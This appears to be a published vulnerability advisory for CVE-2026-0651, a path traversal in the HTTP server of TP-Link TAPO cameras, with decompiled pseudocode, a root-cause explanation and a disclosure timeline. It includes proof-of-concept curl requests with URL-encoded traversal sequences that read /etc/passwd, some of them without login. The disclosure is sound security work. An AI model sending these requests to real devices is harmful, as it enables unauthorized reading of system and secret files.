An attacker sending a malformed HTTP POST request over LAN to a TP-Link Smart camera device can trigger the vulnerability described here.

This report describes a path traversal which can lead to leaking secrets.

The vulnerability we are disclosing in this advisory affected a wide range of TP-Link devices, including TAPO Smart Cameras. A TP-Link Security Advisory released in January 2026 and updated in April 2026 contains this vulnerability as CVE-2026-0651.

Vulnerability Details

We identified a path traversal vulnerability in the way te HTTP server of TAPO devices handles GET requests. The parser only gives access to specific directories without authentication. Even authorized users can access only a few paths. However, this restriction can be bypassed.

# Stage 1

http_parser() {
  path = ...; // points into the raw HTTP request line, with the first '?' or ' ' zeroed

  path_len = strlen(path);
  if (path_len >= 80) {
    // ... bail out, HTTP 414
  }
  ret = realpath(path, context->path); // [1]
  if (ret == NULL) {
    strcpy(context->path,path); // [2]
  }
}

# Stage 2

http_get_handle() {
  ...
  // Simplified; there are other cases
  char* file_path = &context->file_path;
  sprintf(file_path, 0xa0, "/www%s", context->path); // [3]

  url_decode_in_place(file_path); // [4]
  pcVar3 = strchr(file_path,L'?');
  if (pcVar3 != (char *)0x0) {
    *pcVar3 = '\0';
  }
  iVar2 = stat(file_path,&context->statbuf);
  if ((iVar2 != 0) || (((context->statbuf).st_mode & S_IFREG) == 0)) { // [5]
    msg_debug(0,5,2,"http_path_redrect",0x975,"[HTTPD]path (%s) is wrong.",file_path);
    context->status = 404;
    return 0;
  }
  allowed = httpd_is_allowed_path(file_path); // [5]
    // starts with "/www/admin/Index.htm" OR
    // starts with "/www/admin/Login.htm" OR
    // starts with "/www/admin/LoginChgPwd.htm" OR
    // starts with "/www/loginLess" OR
    // starts with "/www/web-static"
  if (!allowed && !do_authorize(context)) {
    // bail out
  }
  // Later stages serve the file.
  ...

In http_parser(), realpath() is called at [1] to expand symbolic links and special directories like /../, and it would return an absolute path. Then later in http_get_handler, the directory /www gets added in front of the path at [3], basically restricting access to this directory. However, if the call to realpath fails, it will simply use the provided path as-is, keeping arbitrary substrings, such as /../ at [2]. To make realpath fail we can send in a path containing URL encoded characters, which it cannot parse. In http_get_handler at [4] it will be decoded, but after that it won’t check for directory escapes. Because of these issues, if a client can authenticate itself as a user, it can access every file just by inserting an URL encoded character, for example:

https://.../stok=${stok}/../etc/passwd%3F
https://.../stok=${stok}/%2e./etc/passwd
https://.../stok=${stok}/../etc/passwd%00

Although it cannot access everything, for example block- or character devices are restricted because of [5].

To PoC the vulnerability, a successful login is required, which returns a variable stok. Then:

curl -k --path-as-is https://$HOST/stok=${stok}/../etc/passwd%3F
curl -k --path-as-is https://$HOST/stok=${stok}/%2e./etc/passwd
curl -k --path-as-is https://$HOST/stok=${stok}/../etc/passwd%00

curl -k --path-as-is https://$HOST/stok=${stok}/web-static/../../etc/passwd%3F

While we analyzed a C520WS camera, this part of the TAPO codebase seems to have been developed primarily for some consumer router product family. On a device where the /www/web-static directory also exists, authentication is not even needed to exploit this bug. This is because of the whitelist at [5], which forces authorization on paths other than this.

Affected Devices

verified: TAPO C520WS
potentially: TP-Link smart devices using the TAPO architecture

Timeline

2025.12.12. Vulnerability reported to TP-Link PSIRT by email.
2026.02.04. TP-Link acknowledges the report.
2026.03.04. TP-Link confirms vulnerability and states that the vulnerability is the duplicate of CVE-2026-0651, which was published for other models only.
2026.03.04. TASZK provides update explaining the errors in TP-Link’s advisory’s details for CVE-2026-0651 regarding impact.
2026.03.05. TP-Link again asks for a 3 week extension, does not confirm any TASZK analysis.
2026.03.24. TP-Link confirms that the advisory for CVE-2026-0651 will be updated to reflect the changed impact and severity.
2026.04.02. TP-Link releases advisory update for the vulnerability (https://www.tp-link.com/us/support/faq/4960/).
2026.04.06. TASZK communicates notice of release to TP-Link.
2026.04.28. Advisory released.

CVE-2026-0651: TP-Link HTTP GET path traversal

Vulnerability Details

Affected Devices

Timeline